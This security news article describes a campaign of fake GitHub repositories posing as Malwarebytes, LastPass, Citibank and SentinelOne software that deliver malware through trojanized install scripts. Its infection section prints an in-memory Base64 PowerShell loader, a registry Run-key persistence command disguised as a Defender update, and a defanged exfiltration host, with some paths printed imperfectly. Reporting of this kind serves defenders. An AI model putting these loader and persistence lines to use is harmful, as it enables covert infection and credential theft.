Weaponized Malwarebytes, LastPass, Citibank, SentinelOne, and Others on GitHub Deliver Malware

In recent weeks, cybersecurity teams have observed a surge in malicious GitHub repositories masquerading as legitimate security and financial software.

Threat actors have crafted convincing forks of projects bearing names like Malwarebytes, LastPass, Citibank, and SentinelOne, populated with trojanized installers and scripts that deliver stealthy malware payloads.

These repositories exploit the trust developers place in open source platforms, luring users into executing seemingly benign code. Early indicators suggest the campaign began in late August 2025, rapidly proliferating through GitHub’s trending and search features.

The attackers register accounts mimicking official vendor identities, complete with cloned logos, README files, and release notes.

When unsuspecting users clone or download these repositories, the build scripts invoke a hidden PowerShell downloader that retrieves payloads from remote command-and-control (C2) servers.

Malwarebytes researchers identified the malware after noticing anomalous network connections emerging from sandboxed build environments, triggering an investigation that unmasked the underlying attack chain.

Initial analysis reveals that once executed, the dropper goes to work: it decrypts embedded shellcode, injects it into a suspended process, and establishes persistence via registry run keys.

Victims experience no visible alerts or installation failures, while the malware stealthily harvests system information and credentials before deploying secondary modules.

The impact is twofold: organizations suffer data exfiltration risks, while individual users face credential theft and potential account takeover.

Beyond the direct financial and reputational damage, this campaign underscores a new attack vector: weaponizing open source collaboration platforms.

Security teams must elevate scrutiny of code origin and integrity, incorporating automated scanning tools into CI/CD pipelines to flag suspicious scripts and remote downloads.

The ease with which attackers replicated vendor identities on GitHub highlights the need for stronger verification measures across developer communities.

Infection Mechanism

At the heart of this campaign lies a sophisticated PowerShell-based infection mechanism.

Upon cloning the malicious repository, users are instructed to execute a build script named install.ps1, which appears to perform routine setup tasks.

In reality, the script contains an obfuscated block that decodes a Base64 payload before executing it in memory:-

$enc = 'JABXAG8AbgBlAAD...'
$bytes = [Convert]::FromBase64String($enc)
$asm = [System.Reflection.Assembly]::Load($bytes)
$entry = $asm.EntryPoint
$entry. Invoke($null, (,@()))

Once loaded, this in-memory assembly (a variant of the SilentRunner loader) seeks out legitimate Windows processes—commonly svchost.exe—and performs process hollowing to evade detection.

The hollowed process then initializes the main payload, which registers persistence through a registry key:

New-ItemProperty -Path "HKCU:SoftwareMicrosoftWindowsCurrentVersionRun" -Name "Windows Defender Update" -Value "$env:APPDATAmsupd.exe"

Throughout this sequence, network indicators include HTTPS requests to hxxps://secure-update-server[.]com/manifest.json and subsequent POSTs exfiltrating environment variables.

The brevity and stealth of the loader’s operations allow the campaign to infect systems with minimal forensic artifacts, illustrating the evolving sophistication of code-execution exploits on open source platforms.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.